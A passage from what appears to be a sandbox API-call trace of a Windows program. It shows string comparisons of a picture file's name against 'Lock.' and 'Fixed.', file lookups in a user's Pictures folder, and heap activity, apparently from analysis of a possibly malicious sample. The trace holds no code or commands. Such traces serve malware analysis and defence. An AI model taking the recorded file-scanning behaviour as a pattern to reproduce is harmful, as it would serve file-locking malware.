lpString1="aKMSqrywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KMSqrywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSqrywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SqrywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qrywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ywnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nXqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XqjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qjmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jmY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mY3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0256.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tm.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0256.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.839] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0256.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="waKMSqrywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aKMSqrywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KMSqrywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSqrywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SqrywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qrywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ywnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nXqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XqjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qjmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jmY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mY3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0256.840] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.841] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tm.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0256.841] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0256.841] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0256.841] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.841] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.842] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0256.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.843] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/waKMSqrywnXqjmY3STm.bmp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2379e0, ftCreationTime.dwHighDateTime=0x1d4cbf9, ftLastAccessTime.dwLowDateTime=0x320258a0, ftLastAccessTime.dwHighDateTime=0x1d4c668, ftLastWriteTime.dwLowDateTime=0x320258a0, ftLastWriteTime.dwHighDateTime=0x1d4c668, nFileSizeHigh=0x0, nFileSizeLow=0x11565, dwReserved0=0xa4f0047, dwReserved1=0x20522, cFileName="waKMSqrywnXqjmY3STm.bmp", cAlternateFileName="WAKMSQ~1.BMP")) returned 0xaa5860 [0256.843] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.843] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.845] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.845] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.846] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0256.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.846] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.847] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.847] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.847] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.847] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.848] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.849] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.849] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.850] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 